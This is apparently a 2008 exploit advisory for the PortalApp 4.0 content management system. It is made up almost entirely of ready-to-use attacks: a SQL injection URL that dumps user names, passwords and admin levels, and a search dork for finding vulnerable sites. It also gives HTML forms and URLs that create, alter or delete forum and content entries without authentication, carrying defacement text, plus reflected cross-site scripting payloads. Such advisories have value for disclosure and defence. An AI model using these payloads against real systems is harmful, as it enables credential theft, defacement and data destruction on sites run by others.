##############################################################################
#Title: PortalApp 4.0 Multiple vulnerabilities #
# #
#Discovered By: r3dm0v3 #
# http://r3dm0v3.persianblog.ir #
# r3dm0v3( 4t }yahoo[dot}com #
# Tehran - Iran #
# #
#Vendor: http://www.portalapp.com #
#Vulnerable Version: 4.0, prior versions maybe vulnerable #
#Remote Exploit: Yes #
#Dork: "Copyright @2007 Iatek LLC" #
#Fix: Not Available #
##############################################################################
##############################################################################
# SQL Injection (CRITICAL) #
##############################################################################
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!
#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
author will be usernames
topic will be passwords
replies will be username IDs
views will be access levels (5 is super admin)
##############################################################################
# Following actions in 'forum.asp' can take done without any authentication. #
##############################################################################
create a forum:
<html>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
ForumSection:<input type=text name=ForumSection value="Hacked"><br>
DisplayOrder:<input type=text name=DisplayOrder value=1><br>
<input type=submit>
</form>
</html>
create a topic:
<html>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br>
Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
Icon:<input type=text name=Icon value=14><br>
Show Signature:<input type=text name=Showsignature value=0><br>
Notify:<input type=text name=Notify ><br>
Locked:<input type=text name=Locked value=1><br>
Sticky:<input type=text name=Sticky ><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
DateLast:<input type=text name=DateLast value="6/1/2008"><br>
<input type=submit>
</form>
</html>
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies
##############################################################################
#Following actions in 'Content.asp' can take done without any authentication.#
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
catID:<input type=text name=CatID value=198><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
Author:<input type=text name=Author value=r3dm0v3><br>
title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
DownloadURL:<input type=text name=DownloadURL><br>
Filename:<input type=text name=Filename><br>
Thumbnail:<input type=text name=Thumbnail><br>
Image1:<input type=text name=Image1><br>
PrevContentID:<input type=text name=PrevContentId><br>
NextContentID:<input type=text name=NextContentId><br>
views:<input type=text name=Impressions value=10000><br>
AVGRating:<input type=text name=AvgRating value=10000><br>
<input type=submit>
</form>
</html>
'insert_detail_content' is also vulnerable. Use above html code for exploit
##############################################################################
# XSS #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
# milw0rm.com [2008-01-06]